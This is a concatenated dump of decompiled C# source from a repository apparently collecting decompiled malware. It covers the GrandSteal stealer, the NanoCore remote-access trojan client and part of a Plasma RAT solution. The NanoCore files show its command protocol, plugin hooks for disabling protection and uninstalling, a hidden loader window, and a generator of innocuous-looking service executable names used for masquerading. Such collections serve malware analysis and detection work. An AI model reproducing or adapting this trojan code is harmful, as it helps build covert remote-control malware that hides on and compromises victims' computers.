58 | 		// (remove) Token: 0x060000A5 RID: 165 RVA: 0x000039E4 File Offset: 0x00001BE4
59 | 		[method: CompilerGenerated]
60 | 		[CompilerGenerated]
61 | 		public event PropertyChangedEventHandler PropertyChanged;
62 | 
63 | 		// Token: 0x04000045 RID: 69
64 | 		private DesktopFile _rootFile;
65 | 
66 | 		// Token: 0x04000046 RID: 70
67 | 		private DesktopFile _mapFile;
68 | 	}
69 | }
70 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | 
 7 | [assembly: AssemblyVersion("1.0.0.0")]
 8 | [assembly: AssemblyTrademark("")]
 9 | [assembly: AssemblyCopyright("Copyright ©  2018")]
10 | [assembly: AssemblyProduct("GrandSteal.SharedModels")]
11 | [assembly: AssemblyFileVersion("1.0.0.0")]
12 | [assembly: Guid("7c1d7923-5461-41ed-83a4-d15cde360faf")]
13 | [assembly: ComVisible(false)]
14 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: CompilationRelaxations(8)]
17 | [assembly: AssemblyTitle("GrandSteal.SharedModels")]
18 | [assembly: AssemblyCompany("")]
19 | [assembly: AssemblyConfiguration("")]
20 | [assembly: AssemblyDescription("")]
21 | [module: ConfusedBy("ConfuserEx v1.0.0-33-ga1d8d38")]
22 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NanoCore Client", "NanoCore Client\NanoCore Client.csproj", "{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Debug|x86.Build.0 = Debug|x86
22 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|Any CPU.ActiveCfg = Release|x86
23 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|Any CPU.Build.0 = Release|x86
24 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|Mixed Platforms.ActiveCfg = Release|x86
25 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|Mixed Platforms.Build.0 = Release|x86
26 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|x86.ActiveCfg = Release|x86
27 | 		{10AB3C9F-CBA7-4E39-9742-AAD86BD54EE4}.Release|x86.Build.0 = Release|x86
28 | 	EndGlobalSection
29 | 	GlobalSection(SolutionProperties) = preSolution
30 | 		HideSolutionNode = FALSE
31 | 	EndGlobalSection
32 | EndGlobal
33 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/BaseCommand.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000031 RID: 49
 4 | public enum BaseCommand : byte
 5 | {
 6 | 	// Token: 0x0400007B RID: 123
 7 | 	Initialize,
 8 | 	// Token: 0x0400007C RID: 124
 9 | 	ConnectDone,
10 | 	// Token: 0x0400007D RID: 125
11 | 	CreatePipe,
12 | 	// Token: 0x0400007E RID: 126
13 | 	PipeCreated,
14 | 	// Token: 0x0400007F RID: 127
15 | 	Transmission,
16 | 	// Token: 0x04000080 RID: 128
17 | 	UnhandledException,
18 | 	// Token: 0x04000081 RID: 129
19 | 	KeepAlive,
20 | 	// Token: 0x04000082 RID: 130
21 | 	ExceptionHash,
22 | 	// Token: 0x04000083 RID: 131
23 | 	ExceptionData
24 | }
25 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Class0.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Net;
 3 | using System.Net.Sockets;
 4 | using Microsoft.VisualBasic.CompilerServices;
 5 | 
 6 | // Token: 0x02000002 RID: 2
 7 | [StandardModule]
 8 | internal sealed class Class0
 9 | {
10 | 	// Token: 0x06000001 RID: 1 RVA: 0x00002ECC File Offset: 0x000010CC
11 | 	public static bool smethod_0(IPAddress ipaddress_0)
12 | 	{
13 | 		if (ipaddress_0.AddressFamily != AddressFamily.InterNetwork)
14 | 		{
15 | 			return false;
16 | 		}
17 | 		byte[] addressBytes = ipaddress_0.GetAddressBytes();
18 | 		return addressBytes[0] == 10 || (addressBytes[0] == 172 && addressBytes[1] > 15 && addressBytes[1] < 32) || (addressBytes[0] == 192 && addressBytes[1] == 168);
19 | 	}
20 | }
21 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Class21.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using Microsoft.VisualBasic.ApplicationServices;
 5 | 
 6 | // Token: 0x02000026 RID: 38
 7 | [GeneratedCode("MyTemplate", "8.0.0.0")]
 8 | [EditorBrowsable(EditorBrowsableState.Never)]
 9 | internal sealed class Class21 : ConsoleApplicationBase
10 | {
11 | }
12 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Class25.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.CodeDom.Compiler;
 3 | using System.ComponentModel;
 4 | using System.Diagnostics;
 5 | using Microsoft.VisualBasic.Devices;
 6 | 
 7 | // Token: 0x0200002B RID: 43
 8 | [EditorBrowsable(EditorBrowsableState.Never)]
 9 | [GeneratedCode("MyTemplate", "8.0.0.0")]
10 | internal sealed class Class25 : Computer
11 | {
12 | 	// Token: 0x06000142 RID: 322 RVA: 0x00002B15 File Offset: 0x00000D15
13 | 	[EditorBrowsable(EditorBrowsableState.Never)]
14 | 	[DebuggerHidden]
15 | 	public Class25()
16 | 	{
17 | 	}
18 | }
19 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Class6.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using Microsoft.VisualBasic.CompilerServices;
 3 | using NanoCore.ClientPlugin;
 4 | using NanoCore.ClientPluginHost;
 5 | 
 6 | // Token: 0x0200000E RID: 14
 7 | [StandardModule]
 8 | internal sealed class Class6
 9 | {
10 | 	// Token: 0x0400001C RID: 28
11 | 	public static Type[] type_0 = new Type[]
12 | 	{
13 | 		typeof(IClientNetwork),
14 | 		typeof(IClientData),
15 | 		typeof(IClientApp)
16 | 	};
17 | 
18 | 	// Token: 0x0400001D RID: 29
19 | 	public static Type[] type_1 = new Type[]
20 | 	{
21 | 		typeof(IClientDataHost),
22 | 		typeof(IClientNetworkHost),
23 | 		typeof(IClientUIHost),
24 | 		typeof(IClientLoggingHost),
25 | 		typeof(IClientAppHost)
26 | 	};
27 | }
28 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/ClientLoaderForm.Designer.cs:
--------------------------------------------------------------------------------
1 | // Token: 0x0200003E RID: 62
2 | public partial class ClientLoaderForm : global::System.Windows.Forms.Form
3 | {
4 | }
5 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/ClientLoaderForm.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Windows.Forms;
 3 | 
 4 | // Token: 0x0200003E RID: 62
 5 | public partial class ClientLoaderForm : Form
 6 | {
 7 | 	// Token: 0x060001BB RID: 443 RVA: 0x00009770 File Offset: 0x00007970
 8 | 	public ClientLoaderForm()
 9 | 	{
10 | 		base.FormClosing += this.ClientLoaderForm_FormClosing;
11 | 		base.Shown += this.ClientLoaderForm_Shown;
12 | 		Application.EnableVisualStyles();
13 | 		Class8.clientLoaderForm_0 = this;
14 | 		this.ShowInTaskbar = false;
15 | 		this.WindowState = FormWindowState.Minimized;
16 | 	}
17 | 
18 | 	// Token: 0x060001BC RID: 444 RVA: 0x00002E97 File Offset: 0x00001097
19 | 	[STAThread]
20 | 	public static void Main()
21 | 	{
22 | 		Application.Run(Class1.smethod_3().method_0());
23 | 	}
24 | 
25 | 	// Token: 0x060001BD RID: 445 RVA: 0x00002EA8 File Offset: 0x000010A8
26 | 	private void ClientLoaderForm_FormClosing(object sender, FormClosingEventArgs e)
27 | 	{
28 | 		Class8.smethod_40(false);
29 | 		if (Class8.byte_1 != null)
30 | 		{
31 | 			Class8.smethod_92();
32 | 		}
33 | 	}
34 | 
35 | 	// Token: 0x060001BE RID: 446 RVA: 0x00002EBC File Offset: 0x000010BC
36 | 	private void ClientLoaderForm_Shown(object sender, EventArgs e)
37 | 	{
38 | 		this.Visible = false;
39 | 		Class8.smethod_0();
40 | 	}
41 | }
42 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/ClientLoaderForm.resources:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p3pperp0tts/malware_decompiled_code/6fb231cdf62c9232524190a5da02f2af28242380/Nanocore_06_2019/NanoCore Client/ClientLoaderForm.resources


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/CommandType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200003F RID: 63
 4 | public enum CommandType : byte
 5 | {
 6 | 	// Token: 0x040000B9 RID: 185
 7 | 	BaseCommand,
 8 | 	// Token: 0x040000BA RID: 186
 9 | 	PluginCommand,
10 | 	// Token: 0x040000BB RID: 187
11 | 	FileCommand
12 | }
13 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Delegate0.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Runtime.CompilerServices;
 4 | 
 5 | // Token: 0x02000024 RID: 36
 6 | // (Invoke) Token: 0x0600010C RID: 268
 7 | [DebuggerDisplay("<generated method>", Type = "<generated method>")]
 8 | [CompilerGenerated]
 9 | internal delegate void Delegate0();
10 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/FileCommand.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000040 RID: 64
 4 | public enum FileCommand : byte
 5 | {
 6 | 	// Token: 0x040000BD RID: 189
 7 | 	GetDetails,
 8 | 	// Token: 0x040000BE RID: 190
 9 | 	ValidateSource,
10 | 	// Token: 0x040000BF RID: 191
11 | 	ValidateBlock,
12 | 	// Token: 0x040000C0 RID: 192
13 | 	GetBlockHash,
14 | 	// Token: 0x040000C1 RID: 193
15 | 	WriteBlockData,
16 | 	// Token: 0x040000C2 RID: 194
17 | 	ReadBlockData
18 | }
19 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass0.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000008 RID: 8
 4 | public sealed class GClass0
 5 | {
 6 | 	// Token: 0x06000022 RID: 34 RVA: 0x00002174 File Offset: 0x00000374
 7 | 	public void method_0(Guid guid_1, string string_1, GClass3 gclass3_1)
 8 | 	{
 9 | 		this.guid_0 = guid_1;
10 | 		this.string_0 = string_1;
11 | 		this.gclass3_0 = gclass3_1;
12 | 	}
13 | 
14 | 	// Token: 0x0400000B RID: 11
15 | 	public Guid guid_0;
16 | 
17 | 	// Token: 0x0400000C RID: 12
18 | 	public string string_0;
19 | 
20 | 	// Token: 0x0400000D RID: 13
21 | 	public GClass3 gclass3_0;
22 | }
23 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass1.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using NanoCore;
 3 | using NanoCore.ClientPluginHost;
 4 | 
 5 | // Token: 0x02000009 RID: 9
 6 | public sealed class GClass1 : IClientDataHost
 7 | {
 8 | 	// Token: 0x06000023 RID: 35 RVA: 0x0000218B File Offset: 0x0000038B
 9 | 	public GClass1(GClass3 gclass3_1)
10 | 	{
11 | 		this.gclass3_0 = gclass3_1;
12 | 	}
13 | 
14 | 	// Token: 0x17000001 RID: 1
15 | 	// (get) Token: 0x06000024 RID: 36 RVA: 0x00003530 File Offset: 0x00001730
16 | 	public IClientNameObjectCollection Variables
17 | 	{
18 | 		get
19 | 		{
20 | 			return Class8.gclass6_0;
21 | 		}
22 | 	}
23 | 
24 | 	// Token: 0x17000002 RID: 2
25 | 	// (get) Token: 0x06000025 RID: 37 RVA: 0x00003544 File Offset: 0x00001744
26 | 	public IClientNameObjectCollection ClientSettings
27 | 	{
28 | 		get
29 | 		{
30 | 			return Class8.gclass6_1;
31 | 		}
32 | 	}
33 | 
34 | 	// Token: 0x17000003 RID: 3
35 | 	// (get) Token: 0x06000026 RID: 38 RVA: 0x00003558 File Offset: 0x00001758
36 | 	public IClientReadOnlyNameObjectCollection BuilderSettings
37 | 	{
38 | 		get
39 | 		{
40 | 			return Class8.gclass8_0;
41 | 		}
42 | 	}
43 | 
44 | 	// Token: 0x0400000E RID: 14
45 | 	public GClass3 gclass3_0;
46 | }
47 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass10.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using NanoCore.ClientPluginHost;
 3 | 
 4 | // Token: 0x02000030 RID: 48
 5 | public sealed class GClass10 : IClientAppHost
 6 | {
 7 | 	// Token: 0x06000151 RID: 337 RVA: 0x00002B29 File Offset: 0x00000D29
 8 | 	public GClass10(GClass3 gclass3_1)
 9 | 	{
10 | 		this.gclass3_0 = gclass3_1;
11 | 	}
12 | 
13 | 	// Token: 0x06000152 RID: 338 RVA: 0x00002B38 File Offset: 0x00000D38
14 | 	public void Restart()
15 | 	{
16 | 		Class8.smethod_41();
17 | 	}
18 | 
19 | 	// Token: 0x06000153 RID: 339 RVA: 0x00002B3F File Offset: 0x00000D3F
20 | 	public void Shutdown()
21 | 	{
22 | 		Class8.smethod_42();
23 | 	}
24 | 
25 | 	// Token: 0x06000154 RID: 340 RVA: 0x00002B46 File Offset: 0x00000D46
26 | 	public void DisableProtection()
27 | 	{
28 | 		Class8.smethod_45();
29 | 	}
30 | 
31 | 	// Token: 0x06000155 RID: 341 RVA: 0x00002B4D File Offset: 0x00000D4D
32 | 	public void RestoreProtection()
33 | 	{
34 | 		Class8.smethod_46();
35 | 	}
36 | 
37 | 	// Token: 0x06000156 RID: 342 RVA: 0x00002B54 File Offset: 0x00000D54
38 | 	public void Uninstall()
39 | 	{
40 | 		Class8.smethod_91();
41 | 	}
42 | 
43 | 	// Token: 0x04000079 RID: 121
44 | 	public GClass3 gclass3_0;
45 | }
46 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass2.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200000B RID: 11
 4 | public sealed class GClass2
 5 | {
 6 | 	// Token: 0x0400000F RID: 15
 7 | 	public DateTime dateTime_0;
 8 | 
 9 | 	// Token: 0x04000010 RID: 16
10 | 	public string string_0;
11 | 
12 | 	// Token: 0x04000011 RID: 17
13 | 	public Guid guid_0;
14 | 
15 | 	// Token: 0x04000012 RID: 18
16 | 	public bool bool_0;
17 | 
18 | 	// Token: 0x04000013 RID: 19
19 | 	public byte[] byte_0;
20 | 
21 | 	// Token: 0x04000014 RID: 20
22 | 	public byte[] byte_1;
23 | 
24 | 	// Token: 0x04000015 RID: 21
25 | 	public GClass3 gclass3_0;
26 | }
27 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass4.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using NanoCore.ClientPluginHost;
 3 | 
 4 | // Token: 0x0200000D RID: 13
 5 | public sealed class GClass4 : IClientNetworkHost
 6 | {
 7 | 	// Token: 0x06000037 RID: 55 RVA: 0x00002295 File Offset: 0x00000495
 8 | 	public GClass4(GClass3 gclass3_1)
 9 | 	{
10 | 		this.gclass3_0 = gclass3_1;
11 | 	}
12 | 
13 | 	// Token: 0x17000004 RID: 4
14 | 	// (get) Token: 0x06000038 RID: 56 RVA: 0x000022A4 File Offset: 0x000004A4
15 | 	public bool Connected
16 | 	{
17 | 		get
18 | 		{
19 | 			return Class8.client_0.method_35();
20 | 		}
21 | 	}
22 | 
23 | 	// Token: 0x06000039 RID: 57 RVA: 0x000022B0 File Offset: 0x000004B0
24 | 	public void ClosePipe(string string_0)
25 | 	{
26 | 		if (Class8.dictionary_2.ContainsKey(string_0))
27 | 		{
28 | 			Class8.dictionary_2[string_0].method_56();
29 | 		}
30 | 	}
31 | 
32 | 	// Token: 0x0600003A RID: 58 RVA: 0x000022CF File Offset: 0x000004CF
33 | 	public bool PipeExists(string string_0)
34 | 	{
35 | 		return Class8.dictionary_2.ContainsKey(string_0);
36 | 	}
37 | 
38 | 	// Token: 0x0600003B RID: 59 RVA: 0x000022DC File Offset: 0x000004DC
39 | 	public void Disconnect()
40 | 	{
41 | 		Class8.client_0.method_56();
42 | 	}
43 | 
44 | 	// Token: 0x0600003C RID: 60 RVA: 0x0000356C File Offset: 0x0000176C
45 | 	public void SendToServer(string string_0, bool bool_0, params object[] object_0)
46 | 	{
47 | 		if (object_0 == null)
48 | 		{
49 | 			Class8.smethod_85(this.gclass3_0, new Exception("One or more parameters are null."), "SendToServer");
50 | 			return;
51 | 		}
52 | 		Client client_ = Class8.client_0;
53 | 		if (!string.IsNullOrEmpty(string_0))
54 | 		{
55 | 			if (!Class8.dictionary_2.ContainsKey(string_0))
56 | 			{
57 | 				return;
58 | 			}
59 | 			client_ = Class8.dictionary_2[string_0];
60 | 		}
61 | 		Class8.smethod_89(client_, bool_0, CommandType.BaseCommand, 4, this.gclass3_0.guid_0, object_0);
62 | 	}
63 | 
64 | 	// Token: 0x0600003D RID: 61 RVA: 0x000022E8 File Offset: 0x000004E8
65 | 	public void AddHostEntry(string string_0)
66 | 	{
67 | 		Class8.smethod_64(string_0);
68 | 	}
69 | 
70 | 	// Token: 0x0600003E RID: 62 RVA: 0x000022F0 File Offset: 0x000004F0
71 | 	public void RebuildHostCache()
72 | 	{
73 | 		Class8.smethod_63();
74 | 	}
75 | 
76 | 	// Token: 0x0400001B RID: 27
77 | 	public GClass3 gclass3_0;
78 | }
79 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass7.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using NanoCore.ClientPluginHost;
 3 | 
 4 | // Token: 0x02000021 RID: 33
 5 | public sealed class GClass7 : IClientLoggingHost
 6 | {
 7 | 	// Token: 0x060000F9 RID: 249 RVA: 0x000026B2 File Offset: 0x000008B2
 8 | 	public GClass7(GClass3 gclass3_1)
 9 | 	{
10 | 		this.gclass3_0 = gclass3_1;
11 | 	}
12 | 
13 | 	// Token: 0x060000FA RID: 250 RVA: 0x000026C1 File Offset: 0x000008C1
14 | 	public void LogClientException(Exception exception_0, string string_0)
15 | 	{
16 | 		Class8.smethod_85(this.gclass3_0, exception_0, string_0);
17 | 	}
18 | 
19 | 	// Token: 0x060000FB RID: 251 RVA: 0x000026D0 File Offset: 0x000008D0
20 | 	public void LogClientMessage(string string_0)
21 | 	{
22 | 		Class8.smethod_87(string_0);
23 | 	}
24 | 
25 | 	// Token: 0x04000058 RID: 88
26 | 	public GClass3 gclass3_0;
27 | }
28 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GClass9.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.CompilerServices;
 3 | using NanoCore;
 4 | using NanoCore.ClientPluginHost;
 5 | 
 6 | // Token: 0x02000027 RID: 39
 7 | public sealed class GClass9 : IClientUIHost
 8 | {
 9 | 	// Token: 0x06000113 RID: 275 RVA: 0x00002718 File Offset: 0x00000918
10 | 	public GClass9(GClass3 gclass3_1)
11 | 	{
12 | 		this.gclass3_0 = gclass3_1;
13 | 	}
14 | 
15 | 	// Token: 0x06000114 RID: 276 RVA: 0x00007508 File Offset: 0x00005708
16 | 	public void Invoke(ClientInvokeDelegate clientInvokeDelegate_0, object object_0)
17 | 	{
18 | 		if (clientInvokeDelegate_0 == null)
19 | 		{
20 | 			Class8.smethod_85(this.gclass3_0, new Exception("One or more parameters are null."), "Invoke");
21 | 			return;
22 | 		}
23 | 		if (Class8.clientLoaderForm_0.InvokeRequired)
24 | 		{
25 | 			Class8.clientLoaderForm_0.Invoke(clientInvokeDelegate_0, new object[]
26 | 			{
27 | 				RuntimeHelpers.GetObjectValue(object_0)
28 | 			});
29 | 		}
30 | 		else
31 | 		{
32 | 			clientInvokeDelegate_0.Invoke(RuntimeHelpers.GetObjectValue(object_0));
33 | 		}
34 | 	}
35 | 
36 | 	// Token: 0x0400005F RID: 95
37 | 	public GClass3 gclass3_0;
38 | }
39 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GDelegate0.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x0200000A RID: 10
4 | // (Invoke) Token: 0x0600002A RID: 42
5 | public delegate void GDelegate0(string string_0);
6 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GStruct0.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200000F RID: 15
 4 | public struct GStruct0
 5 | {
 6 | 	// Token: 0x0400001E RID: 30
 7 | 	public DateTime dateTime_0;
 8 | 
 9 | 	// Token: 0x0400001F RID: 31
10 | 	public Guid guid_0;
11 | 
12 | 	// Token: 0x04000020 RID: 32
13 | 	public string string_0;
14 | 
15 | 	// Token: 0x04000021 RID: 33
16 | 	public byte[] byte_0;
17 | 
18 | 	// Token: 0x04000022 RID: 34
19 | 	public byte[] byte_1;
20 | }
21 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GStruct1.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000023 RID: 35
 4 | public struct GStruct1
 5 | {
 6 | 	// Token: 0x06000107 RID: 263 RVA: 0x00007280 File Offset: 0x00005480
 7 | 	public static GStruct1 smethod_0(Guid guid_0)
 8 | 	{
 9 | 		Random random = new Random(GStruct1.smethod_1(guid_0));
10 | 		int num = random.Next(GStruct1.string_2.Length);
11 | 		string text = GStruct1.string_2[num];
12 | 		string arg = GStruct1.string_3[num];
13 | 		string text2 = string.Empty;
14 | 		do
15 | 		{
16 | 			text2 = GStruct1.string_4[random.Next(GStruct1.string_4.Length)];
17 | 		}
18 | 		while (text2[text2.Length - 1] == text[0]);
19 | 		return new GStruct1
20 | 		{
21 | 			string_0 = string.Format("{0} {1}", text2.ToUpper(), arg),
22 | 			string_1 = string.Format("{0}{1}.exe", text2, text)
23 | 		};
24 | 	}
25 | 
26 | 	// Token: 0x06000108 RID: 264 RVA: 0x00007328 File Offset: 0x00005528
27 | 	private static int smethod_1(Guid guid_0)
28 | 	{
29 | 		byte[] array = guid_0.ToByteArray();
30 | 		int num = BitConverter.ToInt32(array, 0);
31 | 		int num2 = 4;
32 | 		int num3 = array.Length - 1;
33 | 		for (int i = num2; i <= num3; i++)
34 | 		{
35 | 			num ^= (int)array[i];
36 | 		}
37 | 		return num;
38 | 	}
39 | 
40 | 	// Token: 0x04000059 RID: 89
41 | 	public string string_0;
42 | 
43 | 	// Token: 0x0400005A RID: 90
44 | 	public string string_1;
45 | 
46 | 	// Token: 0x0400005B RID: 91
47 | 	private static string[] string_2 = new string[]
48 | 	{
49 | 		"ss",
50 | 		"mon",
51 | 		"mgr",
52 | 		"sv",
53 | 		"svc",
54 | 		"host"
55 | 	};
56 | 
57 | 	// Token: 0x0400005C RID: 92
58 | 	private static string[] string_3 = new string[]
59 | 	{
60 | 		"Subsystem",
61 | 		"Monitor",
62 | 		"Manager",
63 | 		"Service",
64 | 		"Service",
65 | 		"Host"
66 | 	};
67 | 
68 | 	// Token: 0x0400005D RID: 93
69 | 	private static string[] string_4 = new string[]
70 | 	{
71 | 		"dhcp",
72 | 		"upnp",
73 | 		"tcp",
74 | 		"udp",
75 | 		"saas",
76 | 		"iss",
77 | 		"smtp",
78 | 		"dos",
79 | 		"dpi",
80 | 		"pci",
81 | 		"scsi",
82 | 		"wan",
83 | 		"lan",
84 | 		"nat",
85 | 		"imap",
86 | 		"nas",
87 | 		"ntfs",
88 | 		"wpa",
89 | 		"dsl",
90 | 		"agp",
91 | 		"arp",
92 | 		"ddp",
93 | 		"dns"
94 | 	};
95 | }
96 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GStruct2.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200002D RID: 45
 4 | public struct GStruct2
 5 | {
 6 | 	// Token: 0x04000072 RID: 114
 7 | 	public byte byte_0;
 8 | 
 9 | 	// Token: 0x04000073 RID: 115
10 | 	public byte byte_1;
11 | 
12 | 	// Token: 0x04000074 RID: 116
13 | 	public Guid guid_0;
14 | 
15 | 	// Token: 0x04000075 RID: 117
16 | 	public object[] object_0;
17 | }
18 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/GStruct3.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200002F RID: 47
 4 | public struct GStruct3
 5 | {
 6 | 	// Token: 0x04000077 RID: 119
 7 | 	public long long_0;
 8 | 
 9 | 	// Token: 0x04000078 RID: 120
10 | 	public string string_0;
11 | }
12 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/PluginCommand.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000041 RID: 65
 4 | public enum PluginCommand : byte
 5 | {
 6 | 	// Token: 0x040000C4 RID: 196
 7 | 	HostDetails,
 8 | 	// Token: 0x040000C5 RID: 197
 9 | 	HostData,
10 | 	// Token: 0x040000C6 RID: 198
11 | 	Details,
12 | 	// Token: 0x040000C7 RID: 199
13 | 	Data
14 | }
15 | 


--------------------------------------------------------------------------------
/Nanocore_06_2019/NanoCore Client/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using System.Runtime.CompilerServices;
 4 | using System.Runtime.InteropServices;
 5 | 
 6 | [assembly: AssemblyVersion("1.2.2.0")]
 7 | [assembly: AssemblyCopyright("")]
 8 | [assembly: Guid("bfab3936-592c-4256-9bcb-56e203c94bc1")]
 9 | [assembly: CLSCompliant(false)]
10 | [assembly: AssemblyCompany("")]
11 | [assembly: AssemblyProduct("")]
12 | [assembly: AssemblyTrademark("")]
13 | [assembly: AssemblyTitle("")]
14 | [assembly: ComVisible(false)]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: AssemblyFileVersion("1.2.2.0")]
17 | [assembly: CompilationRelaxations(8)]
18 | [assembly: AssemblyDescription("")]
19 | 


--------------------------------------------------------------------------------
/Plasma_RAT_06_2016/StubAdmin.bin.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 11.00
 3 | # Visual Studio 2010
 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StubAdmin.bin", "StubAdmin.bin\StubAdmin.bin.csproj", "{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Any CPU = Debug|Any CPU
 9 | 		Debug|Mixed Platforms = Debug|Mixed Platforms
10 | 		Debug|x86 = Debug|x86
11 | 		Release|Any CPU = Release|Any CPU
12 | 		Release|Mixed Platforms = Release|Mixed Platforms
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|Any CPU.ActiveCfg = Debug|x86
17 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|Any CPU.Build.0 = Debug|x86
18 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|Mixed Platforms.ActiveCfg = Debug|x86
19 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|Mixed Platforms.Build.0 = Debug|x86
20 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|x86.ActiveCfg = Debug|x86
21 | 		{F9216EF0-A5AD-42D7-B4A1-A3D865D04F31}.Debug|x86.Build.0 = Debug|x86
